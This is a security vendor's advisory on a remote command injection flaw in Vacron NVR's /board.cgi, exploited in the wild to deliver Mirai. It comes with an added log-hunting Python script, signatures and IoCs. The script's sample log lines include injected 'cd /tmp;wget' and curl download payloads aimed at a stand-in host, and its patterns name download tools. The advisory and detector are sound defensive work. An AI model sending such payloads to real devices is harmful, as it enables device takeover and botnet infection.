Vacron Network Video Recorder Remote Command Execution

The SonicWall Capture Labs threat research team observed attacks exploiting an old vulnerability in Vacron NVR.

Network video recorders (NVRs) are IP-based appliances that are built for managing cameras, recording and viewing camera feeds at a site. NVRs are usually PC-grade or low-end server systems made using commercial off-the-shelf (COTS) hardware components. They typically contain an embedded operating system or a client operating system that hosts video management software, which provides users a mechanism to view, record and manage camera feeds. Vacron sells NVRs as well as other products.

Vacron NVR Remote Command Execution Vulnerability

The goal of a command injection attack is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.

The remote Vacron network video recorder is affected by a remote command execution vulnerability due to improper sanitization of user-supplied input passed via /board.cgi.

The following are some of the exploits found in the wild:

As one can see, the vulnerable /board.cgi does not properly sanitize the input. This allows the attacker to inject and execute commands that change the directory and download a malicious script from the attacker-controlled server.
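For defenders reviewing web or proxy logs in front of an NVR, the behaviour described above can be hunted for directly. The following is an added example, not SonicWall's signature logic: it flags requests to /board.cgi whose decoded query string contains shell metacharacters, and raises the verdict when directory-change or download commands are also present. The log lines, the parameter name `p`, the host `example.invalid` and the list of download tools are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that let input break out of the command the CGI intended to run.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# Commands matching the behaviour described above (tool list is an assumption).
FETCH_CMDS = re.compile(r"\b(cd|wget|curl|tftp)\b")
# Combined-log-format prefix: client ip, two fields, [time], "METHOD target proto"
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

SAMPLE_LOG = [  # constructed lines; addresses are RFC 5737 documentation ranges
    '192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] "GET /board.cgi?p=status&id=3 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:00:00:02 +0000] "GET /board.cgi?p=cd+/tmp;wget+http://example.invalid/x.sh HTTP/1.1" 200 0',
    '198.51.100.8 - - [01/Jan/2024:00:00:03 +0000] "GET /board.cgi?p=a%253Bcurl%2520example.invalid HTTP/1.1" 200 0',
    '203.0.113.5 - - [01/Jan/2024:00:00:04 +0000] "GET /index.html?q=a;b HTTP/1.1" 200 99',
]

def classify(line):
    """Return (client_ip, verdict) for one access-log line, or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, _method, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/board.cgi"):
        return ip, "ignore"
    # Split on the literal '&' separator first, then decode each field twice so
    # that double-encoded payloads (%253B -> %3B -> ;) are still seen.
    fields = [unquote_plus(unquote_plus(f)) for f in parts.query.split("&")]
    verdict = "benign"
    for field in fields:
        if SHELL_META.search(field):
            if FETCH_CMDS.search(field):
                return ip, "alert"
            verdict = "suspicious"
    return ip, verdict

def flagged(lines):
    """Return (ip, verdict) pairs worth an analyst's attention, in log order."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r[1] in ("alert", "suspicious")]

if __name__ == "__main__":
    for ip, verdict in flagged(SAMPLE_LOG):
        print(f"{verdict:10} {ip}")
```

Any hit on an NVR that should not be Internet-facing is worth following up by checking the device for outbound connections made shortly after the request.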

SonicWall Capture Labs provides protection against this threat via the following signatures:

      • IPS 13033: Vacron NVR Remote Command Execution
      • GAV: Linux.Mirai.N_2

IoCs

    • 222.138.188.211
    • 103.181.56.61
    • 125.44.20.51
    • 175.107.0.212
    • 3a43d007ed5ff84d4b71f96a49c88fe0061a2a9651935a82d4acbf55982fc370

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.